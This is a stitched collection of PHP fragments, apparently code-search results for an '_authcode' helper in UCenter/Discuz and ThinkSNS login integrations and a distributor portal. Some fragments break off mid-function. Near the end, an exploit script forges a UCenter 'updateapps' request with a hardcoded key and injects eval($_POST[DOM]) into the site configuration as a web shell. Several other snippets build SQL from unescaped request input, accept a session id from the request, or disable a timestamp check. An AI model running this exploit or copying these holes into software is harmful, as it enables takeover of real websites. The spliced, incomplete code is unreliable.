function index() { /* 只提供普通的http通知方式 */ error_reporting(0); set_magic_quotes_runtime(0); $_DCACHE = $get = $post = array(); $code = @$_GET['code']; parse_str(_authcode($code, 'DECODE', UC_KEY), $get); $get = _stripslashes($get); $timestamp = time(); if ($timestamp - $get['time'] > 3600) { exit('Authracation has expiried'); } if (empty($get)) { exit('Invalid Request'); } $action = $get['action']; include ROOT_PATH . '/uc_client/lib/xml.class.php'; $post = xml_unserialize(file_get_contents('php://input')); if (in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) { exit($this->{$get}['action']($get, $post)); } else { exit(API_RETURN_FAILED); } }
public function index() { //note 普通的 http 通知方式 if (!defined('IN_UC')) { error_reporting(0); set_magic_quotes_runtime(0); defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); service("Passport"); $_DCACHE = $get = $post = array(); $code = @$_GET['code']; parse_str(_authcode($code, 'DECODE', UC_KEY), $get); if (MAGIC_QUOTES_GPC) { $get = _stripslashes($get); } $timestamp = time(); if ($timestamp - $get['time'] > 3600) { exit('Authracation has expiried'); } if (empty($get)) { exit('Invalid Request'); } $action = $get['action']; require_once DISCUZ_ROOT . './uc_client/lib/xml.class.php'; $post = xml_unserialize(file_get_contents('php://input')); if (in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) { exit($this->{$get}['action']($get, $post)); } else { exit(API_RETURN_FAILED); } } }
public function view_main() { $userInfo = json_decode(_authcode($_COOKIE['hcUser']), true); // print_r($userInfo);exit; $this->smarty->assign('user', $userInfo); $this->smarty->display('basicInformation.html'); }
public function view_index() { $DistributorBasicInformation = A('DistributorBasicInformation'); $data = $DistributorBasicInformation->act_getDistributorBasicInformation(); if ($data['status'] == '6') { header('Location:/index.php?mod=distributorBasicInformation&act=index'); } $category = $DistributorBasicInformation->act_getRootCategoryInfo(); $data['main_products'] = json_decode($data['main_products'], true); $mainProducts = array(); foreach ($data['main_products'] as $v) { $mainProducts[] = $category[$v]; } $loginName = _authcode($_COOKIE['hcUser']); $loginName = json_decode($loginName, true); $loginName = $loginName['email']; $data['intention_products'] = json_decode($data['intention_products'], true); $intentionProducts = array(); foreach ($data['intention_products'] as $v) { $intentionProducts[] = $category[$v]; } $loginName = _authcode($_COOKIE['hcUser']); $loginName = json_decode($loginName, true); $loginName = $loginName['email']; $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/"; $this->smarty->assign(array("loginName" => $loginName, 'type' => $data['type'], 'company' => $data['company'], 'companyShortName' => $data['company_short_name'], 'companyLegalPerson' => $data['company_legal_person'], 'address' => $data['address'], 'address2' => $data['address2'], 'contactPerson' => $data['user_name'], 'contactPersonPhone' => $data['phone'], 'mainProducts' => implode(',', $mainProducts), 'soldToCountries' => $data['sold_to_countries'], 'intentionProducts' => implode(',', $intentionProducts), 'contactPersonExt' => json_decode($data['contact_person_ext'], true), 'contactPersonPhoneExt' => json_decode($data['contact_person_phone_ext'], true))); //图片地址 //echo $baseDir."idCard.jpg";exit; F("dp"); $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/"; $idCardName = get_getSuffixByName("idCard"); $idCardUrl = $baseDir . $idCardName; if (is_file($idCardUrl)) { $this->smarty->assign("idCardUrl", "/images/distributor/" . $loginName . "/" . $idCardName); } $businessLicenseName = get_getSuffixByName("businessLicense"); $businessLicenseUrl = $baseDir . $businessLicenseName; if (is_file($businessLicenseUrl)) { $this->smarty->assign("businessLicenseUrl", "/images/distributor/" . $loginName . "/" . $businessLicenseName); } $taxRegistrationName = get_getSuffixByName("taxRegistration"); $taxRegistrationUrl = $baseDir . $taxRegistrationName; if (is_file($taxRegistrationUrl)) { $this->smarty->assign("taxRegistrationUrl", "/images/distributor/" . $loginName . "/" . $taxRegistrationName); } //高级信息 $advancedData = json_decode($data['advance_data'], true); //var_dump($data);exit; if (!empty($advancedData)) { $this->smarty->assign(array('bank' => $advancedData['bank'], 'bankName' => $advancedData['bank_name'], 'bankUser' => $advancedData['bank_user'], 'bankCardNo' => $advancedData['bank_card_no'], 'compangSumPerson' => $advancedData['compang_sum_person'], 'companyType' => $advancedData['company_type'], 'lastYearSales' => $advancedData['last_year_sales'], 'predictSalesByYear' => $advancedData['predict_sales_by_year'], 'retail' => $advancedData['retail'], 'wholesale' => $advancedData['wholesale'], 'predictSalesByEveryMonth' => $advancedData['predict_sales_by_every_month'], 'startElectricBusinessTime' => $advancedData['start_electric_business_time'], 'electricBusinessPlatform' => $advancedData['electric_business_platform'], 'otherContactPersonName' => $advancedData['other_contact_person_name'], 'otherContactPhone' => $advancedData['other_contact_phone'])); } if ($data['type'] == '1') { $this->smarty->display('sucAuthenticationPersonal.html'); } else { $this->smarty->display('sucAuthentication.html'); } }
public function act_updateCallApi() { $dpInfor = json_decode(_authcode($_COOKIE['hcUser']), true); foreach ($_POST as $k => $v) { $where = 'a.is_delete=0 AND a.api_id=' . mysql_real_escape_string($k) . ' AND a.developer_id=' . $dpInfor['id']; $getApi = M('CallApi')->getDeveloperCallApi('count(*) AS num', $where); if ($getApi[0]['num']) { // print_r($getApi); exit; $callUrl = mysql_real_escape_string($this->act_filterScript($v)); if (!empty($callUrl)) { $newApplyApi = array('callback_url' => $callUrl, 'application_date' => time()); $where2 = 'is_delete=0 AND api_id=' . mysql_real_escape_string($k) . ' AND developer_id=' . $dpInfor['id']; $updateDeveloperCallApi = M('CallApi')->updateDeveloperCallApi($newApplyApi, $where2); if (!$updateDeveloperCallApi) { self::$errMsg[10137] = get_promptmsg(10137); return false; } else { self::$errMsg[200] = get_promptmsg(200); } } else { self::$errMsg[10138] = '申请失败,请检查输入的字符'; return false; } } else { if (trim($v)) { $v = mysql_real_escape_string($this->act_filterScript($v)); if (!empty($v)) { $newApplyApi = array('callback_url' => $v, 'api_id' => mysql_real_escape_string($k), 'developer_id' => $dpInfor['id'], 'application_date' => time(), 'status' => 1); $addDeveloperCallApi = M('CallApi')->insertData($newApplyApi); if (!$addDeveloperCallApi) { self::$errMsg[10137] = get_promptmsg(10137); return false; } else { self::$errMsg[200] = get_promptmsg(200); return true; } } else { self::$errMsg[10139] = get_promptmsg(10139); return false; } } } } return true; }
/** * 根据后图片名称删除分销商图片信息目录下图片 * @param int $id 平台编号 * @return string * @author wcx */ function del_picByName($name) { $loginName = _authcode($_COOKIE['hcUser']); $loginName = json_decode($loginName, true); $loginName = $loginName['email']; $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/"; $idCardUrl = $baseDir . $name; $tmpPic = glob($idCardUrl . "*"); if (empty($tmpPic)) { return true; } $tmpPic = $tmpPic[0]; if (is_file($tmpPic)) { return unlink($tmpPic); } return true; }
public function act_login() { $userName = trim($_REQUEST['useremail']); $password = trim($_REQUEST['userpassword']); $where = 'is_delete=0 AND email="' . $userName . '"'; $ret = M("BacksatagesLogin")->getAdmin("*", $where); if (empty($ret)) { self::$errMsg[10135] = get_promptmsg(10135); //self::$errMsg=g; return false; } $loginInfo = M("interfacePower")->userLogin($userName, $password); if (!$loginInfo) { self::$errMsg[10136] = get_promptmsg(10136); return false; } else { //登录成功 $tmp = array("userId" => $loginInfo['userId'], "userToken" => $loginInfo['userToken'], "userName" => $loginInfo['userName'], "userCnName" => $loginInfo['userCnName'], "globalUserId" => $loginInfo['globalUserId']); setcookie('hcAdmin', _authcode(json_encode($tmp), 'ENCODE'), 0, "/"); $_SESSION['loginStatus'] = "in"; self::$errMsg[200] = get_promptmsg(200); return true; } }
protected function userInfo($data = 'userCnName') { $hcAdmin = json_decode(_authcode($_COOKIE['hcAdmin']), true); return $hcAdmin[$data]; }
public function view_changWatermarkName() { F("dp"); $loginName = json_decode(_authcode($_COOKIE['hcUser']), true); $loginName = $loginName['email']; $baseDir = C("DISTRIBUTOR_KEY_PICTURE_DIR") . $loginName . "/"; $newName = $_REQUEST['newName']; $newName = str_replace("_", "", $newName); $shopPlat = $_REQUEST['shopPlat']; $picPath = $baseDir . $shopPlat . "/"; if (!is_dir($picPath)) { mkdir($picPath, 0777); } $name = get_getSuffixByName("watermark1"); $renameFlag = rename($baseDir . $name, $picPath . $newName . '.png'); echo $this->ajaxReturn(array("flag" => $renameFlag, "imgUrl" => "/images/distributor/" . $loginName . "/" . $shopPlat . "/" . $newName . '.png')); }
function synlogin($get, $post) { session_start(); $uid = $get['uid']; $username = $get['username']; if (!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } registerRole('user', $username); $money = daocall('setting', 'get', array('reg_user_price')); if (!daocall('user', 'getUser', array($username))) { daocall('user', 'newUser', array($username, $get['password'], null, $username, 0, $uid, $money)); } // else{ // daocall('user','updateUserUid',array($username,$uid)); // } header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); _setcookie('Example_auth', _authcode($uid . "\t" . $username, 'ENCODE')); }
function encode_arr($get) { $tmp = ''; foreach ($get as $key => $val) { $tmp .= '&' . $key . '=' . $val; } return _authcode($tmp, 'ENCODE', UC_KEY); }
function synlogin($get, $post) { $uid = $get['uid']; $username = $get['username']; if (!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } $vo = M("members")->field("id,user_name")->where("user_name='{$username}'")->find(); if (is_array($vo)) { //登陆 foreach ($vo as $key => $v) { session("u_{$key}", $v); } $up['uid'] = $vo['id']; $up['add_time'] = time(); $up['ip'] = get_client_ip(); M('member_login')->add($up); } else { //注册 require DISCUZ_ROOT . "uc_client/client.php"; $dataUc = uc_get_user($username); $data['user_name'] = text($username); $data['user_pass'] = text($get['password']); $data['user_email'] = text($dataUc[2]); $count = M('members')->where("user_email = '{$data['user_email']}' OR user_name='{$data['user_name']}'")->count('id'); if ($count > 0) { exit; } $data['reg_time'] = time(); $data['reg_ip'] = get_client_ip(); $data['lastlog_time'] = time(); $data['lastlog_ip'] = get_client_ip(); $newid = M('members')->add($data); if ($newid) { session('u_id', $newid); session('u_user_name', $data['user_name']); Notice(1, $newid); memberMoneyLog($newid, 1, $this->glo['award_reg'], "注册奖励"); } } header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); _setcookie('Example_auth', _authcode($uid . "\t" . $username, 'ENCODE')); }
public function __construct() { @session_start(); $mod = @trim($_GET['mod']); $act = @trim($_GET['act']); #################### smarty初始化 start #################### require WEB_PATH . 'lib/template/smarty/Smarty.class.php'; $this->smarty = new Smarty(); $this->smarty->template_dir = WEB_PATH . 'html/template/v1' . DIRECTORY_SEPARATOR; //模板文件目录 $this->smarty->compile_dir = WEB_PATH . 'smarty/templates_c' . DIRECTORY_SEPARATOR; //编译后文件目录 $this->smarty->config_dir = WEB_PATH . 'smarty/configs' . DIRECTORY_SEPARATOR; //配置文件目录 $this->smarty->cache_dir = WEB_PATH . 'smarty/cache' . DIRECTORY_SEPARATOR; //缓存文件目录 $this->smarty->debugging = false; $this->smarty->caching = false; $this->smarty->cache_lifetime = 120; #################### smarty初始化 end #################### $hcAdmin = @json_decode(_authcode($_COOKIE['hcAdmin']), true); $hcUser = @json_decode(_authcode($_COOKIE['hcUser']), true); if (isset($_REQUEST["PHPSESSID"])) { session_id($_REQUEST["PHPSESSID"]); } else { if (C('IS_AUTH_ON') === true) { //权限控制 if (empty($hcAdmin) && empty($hcUser)) { include_once WEB_PATH . 'lib/class/authuser.class.php'; $_SESSION['loginStatus'] = "out"; //修改退出登录标志 //****判断登录 if (!AuthUser::checkLogin($mod, $act)) { redirect_to(WEB_URL . "index.php?mod=index&act=index"); } } if (empty($hcUser)) { include_once WEB_PATH . 'lib/class/authuser.class.php'; $_SESSION['loginStatus'] = "out"; //修改退出登录标志 //****判断登录 if (!AuthUser::checkLogin($mod, $act)) { redirect_to(WEB_URL . "index.php?mod=index&act=index"); } } if (!empty($hcUser)) { //前台登陆信息 $loginName = $hcUser['email']; } } else { $loginName = $hcUser['email']; } $this->smarty->assign(array("loginName" => $loginName)); //重新登录时,页面跳转到之前的页面 if (!in_array($act, array('login', 'logout', 'userLogin'))) { $now_url = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; //记录当前页面url setcookie('now_url', $now_url, time() + 86400); } //以下三个变量在登录成功的时候写入SESSION $this->_username = isset($hcUser['email']) ? $hcUser['email'] : (isset($hcAdmin['userCnName']) ? $hcAdmin['userCnName'] : "XX"); //登录的中文名字 $this->_userid = isset($hcUser['id']) ? $hcUser['id'] : (isset($hcAdmin['userId']) ? $hcAdmin['userId'] : 0); $this->_companyid = isset($_SESSION['companyId']) ? $_SESSION['companyId'] : 0; $this->_systemid = '12'; //初始化提交过来的变量(post and get) 用与搜索后条件不消失,或者表单信息不消失 if (isset($_GET)) { foreach ($_GET as $gk => $gv) { $this->smarty->assign('g_' . $gk, $gv); } } if (isset($_POST)) { foreach ($_POST as $pk => $pv) { $this->smarty->assign('p_' . $pk, $pv); } } $this->smarty->assign('curusername', @$_SESSION['userName']); //设置当前用户名 $this->smarty->assign('mod', $mod); //模块权限 $this->smarty->assign('act', $act); //操作权限 $this->smarty->assign('_username', $this->_username); //中文名字 $this->smarty->assign('_userid', $this->_userid); //用户id $this->smarty->assign('loginStatus', $_SESSION['loginStatus']); //用户登录状态 //初始化当前页码 $this->page = isset($_GET['page']) && intval($_GET['page']) > 0 ? intval($_GET['page']) : 1; $this->smarty->assign("page", $this->page); } }
function synlogin($get, $post) { $uid = $get['uid']; $username = $get['username']; if (!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); $auth = _authcode($uid . "\t" . $username, 'ENCODE', $this->_tp_conf['AUTH']); setcookie($this->_tp_conf['COOKIE_PREFIX'] . 'auth', $auth, 0, __ROOT__); $time = time(); $url = 'http://' . $_SERVER['HTTP_HOST'] . __ROOT__ . 'index.php'; $data = 'm=User&a=uc_synlogin&uid=' . $uid . '&username='******'&time=' . $time . '&auth=' . md5($uid . $username . $time . $this->_tp_conf['AUTH']); _dCurl($url, $data, false); }
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { global $_G; $ckey_length = 4; $operation = strtoupper($operation); if ($operation == 'DECODE') { $string = _authcode($string, true); } $key = md5($key != '' ? $key : $_G['authkey']); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? $operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length) : ''; $cryptkey = $keya . md5($keya . $keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for ($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for ($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for ($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ $box[($box[$a] + $box[$j]) % 256]); } if ($operation == 'DECODE') { if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { $rs = $keyc . str_replace('=', '', base64_encode($result)); return _authcode($rs, false); } }
function synlogin($get, $post) { $uid = $get['uid']; $username = $get['username']; if(!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); _setcookie('ly_auth', _authcode($uid."\t".$username, 'ENCODE')); }
function synlogin($get, $post) { $uid = $get['uid']; $username = $get['username']; if (!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } require_once $this->appdir . './forumdata/cache/cache_settings.php'; $cookietime = 2592000; $discuz_auth_key = md5($_DCACHE['settings']['authkey'] . $_SERVER['HTTP_USER_AGENT']); header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); $uid = intval($uid); $query = $this->db->query("SELECT username, uid, password, secques FROM " . $this->tablepre . "members WHERE uid='{$uid}'"); if ($member = $this->db->fetch_array($query)) { _setcookie('sid', '', -86400 * 365); _setcookie('cookietime', $cookietime, 31536000); _setcookie('auth', _authcode("{$member['password']}\t{$member['secques']}\t{$member['uid']}", 'ENCODE', $discuz_auth_key), $cookietime); } else { _setcookie('cookietime', $cookietime, 31536000); _setcookie('loginuser', $username, $cookietime); _setcookie('activationauth', _authcode($username, 'ENCODE', $discuz_auth_key), $cookietime); } }
public function act_getAdminInfor($flag = 'userCnName') { $data = json_decode(_authcode($_COOKIE['hcAdmin']), true); return $data[$flag]; }
} function synlogin($get, $post) { $uid = $get['uid']; $username = $get['username']; if (!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } // require_once $this->appdir.'./forumdata/cache/cache_settings.php'; // // $cookietime = 2592000; // $discuz_auth_key = md5($_DCACHE['settings']['authkey'].$_SERVER['HTTP_USER_AGENT']); // header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); // $uid = intval($uid); // $query = $this->db->query("SELECT username, uid, password, secques FROM ".$this->tablepre."members WHERE uid='$uid'"); // if($member = $this->db->fetch_array($query)) { // _setcookie('sid', '', -86400 * 365); // _setcookie('cookietime', $cookietime, 31536000); // _setcookie('auth', _authcode("$member[password]\t$member[secques]\t$member[uid]", 'ENCODE', $discuz_auth_key), $cookietime); // } else { // _setcookie('cookietime', $cookietime, 31536000); // _setcookie('loginuser', $username, $cookietime); // _setcookie('activationauth', _authcode($username, 'ENCODE', $discuz_auth_key), $cookietime); // } // 原来的代码,实际上是discuz的登录cookies header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); _setcookie(COOKIE_NAME, _authcode($uid . "\t" . $username, 'ENCODE'), time() + 365 * 24 * 60 * 60);
/** * 获取当前用户用户名 * @return int * @author lzx * @updater zjr */ function get_username() { $data = json_decode(_authcode($_COOKIE['hcAdmin']), true); return $data['userName']; }
<?php // 代码版权归原作者所有! $timestamp = time() + 10 * 3600; $host = "127.0.0.1"; $uc_key = "eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5Waofq6J285Ca33i151e551g0l9f2l3dd"; $code = urlencode(_authcode("time={$timestamp}&action=updateapps", 'ENCODE', $uc_key)); $cmd1 = '<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://xxx\');eval($_POST[DOM]);//</item> </root>'; $cmd2 = '<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">http://aaa</item> </root>'; $html1 = send($cmd1); echo $html1; $html2 = send($cmd2); echo $html2; function send($cmd) { global $host, $code; $message = "POST /api/uc.php?code=" . $code . " HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: " . $host . "\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: " . $host . "\r\n"; $message .= "Content-Length: " . strlen($cmd) . "\r\n"; $message .= "Connection: Close\r\n\r\n";
define('API_RETURN_FORBIDDEN', '-2'); define('DISCUZ_ROOT', SITE_PATH . '/api/'); define('THINK_PATH', SITE_PATH . '/core/ThinkPHP'); set_magic_quotes_runtime(0); defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); require_once SITE_PATH . '/config/uc_config.inc.php'; //载入ThinkSNS配置 $tsconfig1 = (require_once SITE_PATH . '/config/config.inc.php'); $tsconfig2 = (require_once SITE_PATH . '/core/OpenSociax/convention.php'); $tsconfig = array_merge($tsconfig2, $tsconfig1); $cookiepre = $tsconfig['COOKIE_PREFIX']; $cookiedomain = $tsconfig['COOKIE_DOMAIN']; $cookiepath = $tsconfig['COOKIE_PATH']; $_DCACHE = $get = $post = array(); $code = @$_GET['code']; parse_str(_authcode($code, 'DECODE', UC_KEY), $get); if (MAGIC_QUOTES_GPC) { $get = _stripslashes($get); } //时间戳验证 $timestamp = time(); // if($timestamp - $get['time'] > 3600) { // exit('Authracation has expiried'); // } if (empty($get)) { exit('Invalid Request'); } $action = $get['action']; require_once DISCUZ_ROOT . './uc_client/lib/xml.class.php'; $post = xml_unserialize(file_get_contents('php://input')); // 调试用-写log
public function act_login() { $useremail = isset($_REQUEST['useremail']) ? $_REQUEST['useremail'] : ''; $userpassword = isset($_REQUEST['userpassword']) ? $_REQUEST['userpassword'] : ''; $checkCode = isset($_REQUEST['checkCode']) ? $_REQUEST['checkCode'] : ''; $dvp = M('Developer'); //获取erp_account的做大值 $datas = $dvp->getDeveloper("*", "email = '" . $useremail . "'", " order by id desc ", 1, 1); if (!empty($datas) && $datas[0]['status'] != 5 && $datas[0]['status'] != 4) { $userInfo = $datas[0]; $powerInfo = M("interfacePower")->getUserInfoByLoginEmail($useremail); if (!empty($powerInfo)) { // $powerLogin = M("interfacePower")->userLogin($useremail, $userpassword); if ($powerInfo['loginPsd'] == md5(md5(trim($userpassword)))) { $dpInfor = array("id" => $userInfo['id'], "email" => $userInfo['email'], "status" => $userInfo['status'], "app_key" => $userInfo['app_key'], "pw_global_id" => $powerInfo['userId']); setcookie('hcUser', _authcode(json_encode($dpInfor), 'ENCODE'), 0, "/"); $_SESSION['loginStatus'] = "in"; $this->act_setUserSomeInfor('progressInforFlag', 1); self::$errMsg[200] = get_promptmsg(200, '登录'); return true; } else { self::$errMsg[10152] = get_promptmsg(10152); return false; } } else { if ($datas[0]['login_pwd'] == md5(md5(trim($userpassword)))) { $dpInfor = array("id" => $userInfo['id'], "email" => $userInfo['email'], "status" => $userInfo['status'], "app_key" => $userInfo['app_key']); setcookie('hcUser', _authcode(json_encode($dpInfor), 'ENCODE'), 0, "/"); $_SESSION['loginStatus'] = "in"; $this->act_setUserSomeInfor('progressInforFlag', 1); self::$errMsg[200] = get_promptmsg(200, '登录'); return true; } else { self::$errMsg[10152] = get_promptmsg(10152); return false; } } } else { if ($datas[0]['status'] == 5) { $mailType = explode("@", $useremail); $emailAddrs = C('EMAILADDRESS'); //替换特殊邮箱edu $splitArray = explode(".", $mailType[1]); if (in_array("edu", $splitArray)) { $mailType[1] = str_replace($splitArray[0], "**", $mailType[1]); $emailAddrs[$mailType[1]] = str_replace("**", $splitArray[0], $emailAddrs[$mailType[1]]); } if (!empty($emailAddrs[$mailType[1]])) { self::$errMsg[10051] = "尚未激活,<a style='font-size:12px;text-decoration:blink' target='view_window' href='" . $emailAddrs[$mailType[1]] . "'>去邮箱激活</a>"; } else { self::$errMsg[10154] = get_promptmsg(10154); } return false; } else { if ($datas[0]['status'] == 4) { self::$errMsg[10155] = get_promptmsg(10155); return false; } else { self::$errMsg[10156] = get_promptmsg(10156); return false; } } } }